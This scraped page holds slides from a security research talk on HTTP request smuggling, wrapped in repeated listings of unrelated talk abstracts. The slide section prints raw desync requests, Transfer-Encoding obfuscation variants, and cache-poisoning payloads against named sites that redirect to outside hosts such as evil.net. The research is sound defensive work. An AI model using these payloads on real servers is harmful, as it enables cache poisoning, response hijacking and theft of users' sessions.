This document discusses HTTP desync attacks, also known as request smuggling. It begins with an overview of the topic and various techniques for desynchronizing requests between the frontend and backend servers, such as using conflicting header fields. It then provides case studies of how desync attacks have been used in the past to bypass security rules, extract sensitive responses, and poison caches. The document concludes with recommendations for defenses, such as normalizing requests and using HTTP/2.
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...NoNameCon
https://cfp.nonamecon.org/nnc2020/talk/9LMJAH/
For many years, injection-based vulnerabilities such as XSS and SQL-injection have dominated the web security landscape. However, as browsers and applications are becoming increasingly complex, new vulnerability classes surface. One of these new-kids-on-the-block is XSLeaks, a vulnerability class that exploit side-channel leaks in the browser to extract information across origins. In this presentation, I will describe the various types of leaks in different browser features and the network layer, and discuss how these issues can be exploited to extract sensitive information from an unwitting victim. Furthermore, the talk will cover the numerous (new) defences that need to be adopted in order to safeguard web applications (SameSite cookies, COOP, COEP, ...), and their potential shortcomings. Finally, we will take a peak into the future, and discuss how XSLeaks will likely evolve in the coming months and years.
200, 404, 302. Is it a lock combination? A phone number? No, they're HTTP status codes! As we develop Web applications, we encounter these status codes and others, and often we make decisions about which ones to return without giving much thought to their meaning or context. It's time to take a deeper look at HTTP. Knowing the methods, headers, and status codes, what they mean, and how to use them can help you develop richer Internet applications. Join Ben Ramsey as he takes you on a journey through RFC 2616 to discover some of the gems of HTTP.
As presented at ZendCon, Confoo, LaraconEU, ZgPHP, PFCongres and Fronteers User Group. An overview of some intermediate level HTTP features and how they might be useful in practice.
A talk about how HTTP caching features that can and should be used to reduce origin server loads and traffic whilst retaining very small cache expire times. More specifically will cover what basic http headers are used by standard cache devices and how they differ, as well as how can they be used in combination to achieve smart cache revalidation.
200, 404, 302. Is it a lock combination? A phone number? No, they're HTTP status codes! As we develop Web applications, we encounter these status codes and others, and often we make decisions about which ones to return without giving much thought to their meaning or context. It's time to take a deeper look at HTTP. Knowing the methods, headers, and status codes, what they mean, and how to use them can help you develop richer Internet applications. Join Ben Ramsey as he takes you on a journey through RFC 2616 to discover some of the gems of HTTP.
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...NoNameCon
https://cfp.nonamecon.org/nnc2020/talk/9LMJAH/
For many years, injection-based vulnerabilities such as XSS and SQL-injection have dominated the web security landscape. However, as browsers and applications are becoming increasingly complex, new vulnerability classes surface. One of these new-kids-on-the-block is XSLeaks, a vulnerability class that exploit side-channel leaks in the browser to extract information across origins. In this presentation, I will describe the various types of leaks in different browser features and the network layer, and discuss how these issues can be exploited to extract sensitive information from an unwitting victim. Furthermore, the talk will cover the numerous (new) defences that need to be adopted in order to safeguard web applications (SameSite cookies, COOP, COEP, ...), and their potential shortcomings. Finally, we will take a peak into the future, and discuss how XSLeaks will likely evolve in the coming months and years.
200, 404, 302. Is it a lock combination? A phone number? No, they're HTTP status codes! As we develop Web applications, we encounter these status codes and others, and often we make decisions about which ones to return without giving much thought to their meaning or context. It's time to take a deeper look at HTTP. Knowing the methods, headers, and status codes, what they mean, and how to use them can help you develop richer Internet applications. Join Ben Ramsey as he takes you on a journey through RFC 2616 to discover some of the gems of HTTP.
As presented at ZendCon, Confoo, LaraconEU, ZgPHP, PFCongres and Fronteers User Group. An overview of some intermediate level HTTP features and how they might be useful in practice.
A talk about how HTTP caching features that can and should be used to reduce origin server loads and traffic whilst retaining very small cache expire times. More specifically will cover what basic http headers are used by standard cache devices and how they differ, as well as how can they be used in combination to achieve smart cache revalidation.
200, 404, 302. Is it a lock combination? A phone number? No, they're HTTP status codes! As we develop Web applications, we encounter these status codes and others, and often we make decisions about which ones to return without giving much thought to their meaning or context. It's time to take a deeper look at HTTP. Knowing the methods, headers, and status codes, what they mean, and how to use them can help you develop richer Internet applications. Join Ben Ramsey as he takes you on a journey through RFC 2616 to discover some of the gems of HTTP.
Presentation explains advanced HTTP caching mechanisms like decomposition, stale content delivery, purging based on tags and caching of user-specific data.
More information about this HTTP caching talk can be found on https://feryn.eu/speaking/leverage-http-to-deliver-cacheable-websites-codemotion-rome-2018/
Most of us are familiar with HTTP, but when it actually comes to creating cacheable web content, there is still a lot to be learned. In this presentation I will show you how to leverage specific mechanism to achieve a good hit rate without losing touch with some of the challenges of real-life web projects. Keywords: cache control, cache variations, conditional requests, stateful content, HTTP fragments, invalidation. The goals is to empower developers to control the behavior of reverse caching proxies like Varnish, Content Delivery Networks, or even browser cache, using the power of HTTP.
Altitude San Francisco 2018: Programming the EdgeFastly
Programming the edge
Second floor
Andrew Betts
Principal Developer Advocate, Fastly
Hide abstract
Through our support for running your own code on our edge servers, Fastly's network offers you a platform of unparalleled speed, reliability and efficiency to which you can delegate a surprising amount of logic that has traditionally been in the application layer. In this workshop, you'll implement a series of advanced edge solutions, and learn how to apply these patterns to your own applications to reduce your origin load, dramatically improve performance, and make your applications more secure.
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
Although web application firewall (WAF) solutions are very useful to prevent common or automated attacks, most of them are based on blacklist approaches and are still far from perfect. This talk illustrates a number of creative techniques to smuggle and reshape HTTP requests using the strange behaviour of web servers and features such as request encoding or HTTP pipelining. These methods can come in handy when testing a website behind a WAF and can help penetration testers and bug bounty hunters to avoid drama and pain! Knowing these techniques is also beneficial for the defence team in order to design appropriate mitigation techniques. Additionally, it shows why developers should not solely rely on WAFs as the defence mechanism.
Finally, an open source Burp Suite extension will be introduced that can be used to assess or bypass a WAF solution using some of the techniques discussed in this talk. The plan is to keep improving this extension with the help of the http.ninja project.
Going on an HTTP Diet: Front-End Web PerformanceAdam Norwood
Is your web site or web app feeling sluggish? Getting tired of watching your pages slowly render, the long seconds ticking away before your snazzy jQuery doohickey even has a chance to fire? Chances are it’s not that slow bit of code or that clunky database behind the scenes that’s to blame – 80% of the time spent loading most web pages is on the client side! At this talk, we’ll take a look at some of the easiest low-hanging fruit you can go after to help speed up web performance on the front end, from slimming down the size of content to optimizing HTTP requests, and more.
In this presentation, I show the audience how to implement HTTP caching best practices in a non-intrusive way in PHP Symfony 4 code base.
This presentation focuses on topics like:
- Caching using cache-control headers
- Cache variations using the Vary header
- Conditional requests using headers like ETag & If-None-Match
- ESI discovery & parsing using headers like Surrogate-Capability & Surrogate-Control
- Caching stateful content using JSON Web Token Validation in Varnish
More information about this presentation is available at https://feryn.eu/speaking/developing-cacheable-php-applications-php-limburg-be/
Sessions. We all hear about them. We probably are using them. But do you know how they work? If you are anything like me, when you started programming you just accepted sessions as one of the many "black boxes" of programming. Then, one day, you need to debug a session issue. Or maybe you need your session to span multiple servers set up behind a load balancer. Do you know your options? Better yet, do you know your basics?
This is a beginner session tackling the very basics of sessions in CFML including:
What is a session?
What is the difference between a session and cookies?
What should I put in a session?
How does ColdFusion know which session is mine?
What is the difference between a ColdFusion and J2EE session?
How can I see what sessions are currently running?
How do I manage sessions across multiple servers?
What are some common session gotchas?
And more...
An overview of the HTTP protocol showing the protocol basics such as protocol versions, messages, headers, status codes, connection management, cookies and more.
But it still remains an overview without in-depth information. Also some key aspects are left out (because of limited time) such as authentication, content negotiation, robots, web architecture etc..
Presentation explains advanced HTTP caching mechanisms like decomposition, stale content delivery, purging based on tags and caching of user-specific data.
More information about this HTTP caching talk can be found on https://feryn.eu/speaking/leverage-http-to-deliver-cacheable-websites-codemotion-rome-2018/
Most of us are familiar with HTTP, but when it actually comes to creating cacheable web content, there is still a lot to be learned. In this presentation I will show you how to leverage specific mechanism to achieve a good hit rate without losing touch with some of the challenges of real-life web projects. Keywords: cache control, cache variations, conditional requests, stateful content, HTTP fragments, invalidation. The goals is to empower developers to control the behavior of reverse caching proxies like Varnish, Content Delivery Networks, or even browser cache, using the power of HTTP.
Altitude San Francisco 2018: Programming the EdgeFastly
Programming the edge
Second floor
Andrew Betts
Principal Developer Advocate, Fastly
Hide abstract
Through our support for running your own code on our edge servers, Fastly's network offers you a platform of unparalleled speed, reliability and efficiency to which you can delegate a surprising amount of logic that has traditionally been in the application layer. In this workshop, you'll implement a series of advanced edge solutions, and learn how to apply these patterns to your own applications to reduce your origin load, dramatically improve performance, and make your applications more secure.
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
Although web application firewall (WAF) solutions are very useful to prevent common or automated attacks, most of them are based on blacklist approaches and are still far from perfect. This talk illustrates a number of creative techniques to smuggle and reshape HTTP requests using the strange behaviour of web servers and features such as request encoding or HTTP pipelining. These methods can come in handy when testing a website behind a WAF and can help penetration testers and bug bounty hunters to avoid drama and pain! Knowing these techniques is also beneficial for the defence team in order to design appropriate mitigation techniques. Additionally, it shows why developers should not solely rely on WAFs as the defence mechanism.
Finally, an open source Burp Suite extension will be introduced that can be used to assess or bypass a WAF solution using some of the techniques discussed in this talk. The plan is to keep improving this extension with the help of the http.ninja project.
Going on an HTTP Diet: Front-End Web PerformanceAdam Norwood
Is your web site or web app feeling sluggish? Getting tired of watching your pages slowly render, the long seconds ticking away before your snazzy jQuery doohickey even has a chance to fire? Chances are it’s not that slow bit of code or that clunky database behind the scenes that’s to blame – 80% of the time spent loading most web pages is on the client side! At this talk, we’ll take a look at some of the easiest low-hanging fruit you can go after to help speed up web performance on the front end, from slimming down the size of content to optimizing HTTP requests, and more.
In this presentation, I show the audience how to implement HTTP caching best practices in a non-intrusive way in PHP Symfony 4 code base.
This presentation focuses on topics like:
- Caching using cache-control headers
- Cache variations using the Vary header
- Conditional requests using headers like ETag & If-None-Match
- ESI discovery & parsing using headers like Surrogate-Capability & Surrogate-Control
- Caching stateful content using JSON Web Token Validation in Varnish
More information about this presentation is available at https://feryn.eu/speaking/developing-cacheable-php-applications-php-limburg-be/
Sessions. We all hear about them. We probably are using them. But do you know how they work? If you are anything like me, when you started programming you just accepted sessions as one of the many "black boxes" of programming. Then, one day, you need to debug a session issue. Or maybe you need your session to span multiple servers set up behind a load balancer. Do you know your options? Better yet, do you know your basics?
This is a beginner session tackling the very basics of sessions in CFML including:
What is a session?
What is the difference between a session and cookies?
What should I put in a session?
How does ColdFusion know which session is mine?
What is the difference between a ColdFusion and J2EE session?
How can I see what sessions are currently running?
How do I manage sessions across multiple servers?
What are some common session gotchas?
And more...
An overview of the HTTP protocol showing the protocol basics such as protocol versions, messages, headers, status codes, connection management, cookies and more.
But it still remains an overview without in-depth information. Also some key aspects are left out (because of limited time) such as authentication, content negotiation, robots, web architecture etc..
HTTP is one of the most widely used protocols in the world.
The version of HTTP 1.1, used to this day, was developed and described 18 years ago - 1999.
With the increasing complexity of web applications, the capabilities of HTTP 1.1 are already insufficient to provide increased demands on performance and responsiveness.
So in order to meet new requirements, HTTP must evolve. HTTP 2.0 is designed to make web applications faster, simple and reliable.
In this report I will tell about
- drawbacks of HTTP 1.1 and why we need a new version of HTTP.
- which advantages HTTP/2 offers in comparison with the previous version?
- how the new protocol affected the new version of SERVLET 4.0 and how we can use it.
Presentation given at the International PHP conference in Mainz, October 2012, dealing with a bit of history about the HTTP protocol, SPDY and the future (HTTP/2.0).
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...Ontico
РИТ++ 2017, HighLoad Junior
Зал Сингапур, 6 июня, 11:00
Тезисы:
http://junior.highload.ru/2017/abstracts/2545.html
Вы поставили HTTP-акселератор перед вашим web-сервером для ускорения отдачи контента, но запросы пользователей по-прежнему отдаются с большой задержкой, а ресурсы сервера кажутся незагруженными. А, может, после того, как поставили
web-акселератор, web-приложение сломалось, да еще и так, что проблема воспроизводится редко, хуже того, о ней могут знать ваши пользователи, но не вы.
...
This presentation explains how to deploy and use the Integrated Caching feature on Netscaler. I gave this presentation to Citrix staff, customers and partners in worldwide in 2011. The presentation covers best practices and gotchas :) Integrated Caching is an excellent feature that can greatly improve the performance of your website.
Web Application Security 101 - 02 The BasicsWebsecurify
In part 2 of Web Application Security 101 we cover the basics of HTTP, HTML, XML, JSON, JavaScript, CSS and more in order to get you up to speed with the technology. This knowledge will be used during the rest of the course to explore the various security aspects effecting web applications today.
OWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and AveCheckmarx
Presented by Paulo Silva, Security Researcher at Checkmarx on October 31, 2018 at Polytechnic Institute of Cávado and Ave.
Learn all about the OWASP Top 10 from his talk:
Part I
Web Application architecture
The HTTP protocol
HTTP Request walk-through
Part II
What is OWASP
What is the OWASP TOP 10
OWASP Top 10 walk - through
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
2. The Fear Theory
Q) What topic am I really scared of?
A) HTTP Request Smuggling
Hiding Wookiees in HTTP
First documented by Watchfire in 2005
"You will not earn bounties"
"You will certainly not be considered like a white hat"
3. • Theory & Methodology
• Exploitation Case Studies
• Defence
• Q&A
Outline
6. Desynchronizing: the classic approach
POST / HTTP/1.1
Host: example.com
Content-Length: 6
Content-Length: 5
12345G
Unknown method GPOST
Frontend sees this
Backend sees this
POST / HTTP/1.1
Host: example.com
…
7. Desynchronizing: the chunked approach
POST / HTTP/1.1
Host: example.com
Content-Length: 66
Transfer-Encoding: chunked
0
GPOST / HTTP/1.1
…
Frontend sees this
Backend sees this
Unknown method GPOST
8. Desynchronizing: the TE.CL approach
POST / HTTP/1.1
Host: example.com
Content-Length: 3
Transfer-Encoding: chunked
6
PREFIX
0
POST / HTTP/1.1
Host: example.com
Frontend sees this
Backend sees this
9. Forcing desync
If a message is received with both a Transfer-Encoding header field and a Content-
Length header field, the latter MUST be ignored. – RFC 2616 #4.4.3
Transfer-Encoding
: chunked
Transfer-Encoding: xchunked
GET / HTTP/1.1
Transfer-Encoding: chunked
Transfer-Encoding: chunked
Content-Length: 123
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding:[tab]chunked
X: X[n]Transfer-Encoding: chunked
21. Accidental Cache Poisoning
POST / HTTP/1.1
Host: redacted.com
Content-Length: 45
Transfer-Encoding: chunked
0
POST / HTTP/1.1
Host: 52.16.21.24
X: X
HTTP/1.1 301 Moved Permanently
Location: https://52.16.21.24/
GET /images/x.png HTTP/1.1
Frontend perspective
GET /images/x.png HTTP/1.1
22. Web Cache Deception++
POST / HTTP/1.1
Transfer-Encoding: blah
0
GET /account/settings HTTP/1.1
X: X
HTTP/1.1 200 OK
Your payment history
…
GET /static/site.js HTTP/1.1
Sensitive responses with fixed, uncached extensions
Sensitive POST responses
Frontend perspective
Expected habitat:
GET /static/site.js HTTP/1.1
Cookie: sessionid=xyz
23. CDN Chaining
POST /cow.jpg HTTP/1.1
Host: redacted.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Transfer-Encoding: chunked
0
GET / HTTP/1.1
Host: www.redhat.com
X: X
Red Hat - We make open source technologies for the enterprise
GET…
24. Chaining DOM Problems
GET /assets/idx?redir=//redhat.com@evil.net/ HTTP/1.1
Host: www.redhat.com
<script>
var destination = getQueryParam('redir')
[low quality filtering]
document.location = destination
</script>
POST /en/search?dest=../assets/idx?redir=… HTTP/1.1
Host: www.redhat.com
HTTP/1.1 301 Found
Location: /assets/idx?redir=//redhat.co…
Runs on unknown
URL in victim's
browser
Solution: chain a
server-side local
redirect
25. 'Harmless' responses
POST /etc/libs/xyz.js HTTP/1.1
Host: redacted.com
Content-Length: 57
Transfer-Encoding: chunked
0
POST /etc HTTP/1.1
Host: burpcollaborator.net
X: X
HTTP/1.1 301 Moved Permanently
Location: https://burpcollaborator.net/etc/
GET /etc/libs/xyz.js HTTP/1.1
…
+$550
+$750
+$1,000
+$2,000
+$5,000
+$15,000*
$31,900
26. Web Cache Poisoning
POST /webstatic/r/fb/fb-all-prod.pp2.min.js HTTP/1.1
Host: c.paypal.com
Content-Length: 61
Transfer-Encoding: chunked
0
GET /webstatic HTTP/1.1
Host: skeletonscribe.net
X: XGET /webstatic/r/fb/fb-all-prod.pp2.min.js HTTP/1.1
Host: c.paypal.com
Connection: close
HTTP/1.1 302 Found
Location: http://skeletonscribe.net , c.paypal.com/webstatic/
?
?
32. • Detection doesn't have to be dangerous
• HTTP parsing is security critical
• Complexity is the enemy
TAKEAWAYS
@albinowax
Email: james.kettle@portswigger.net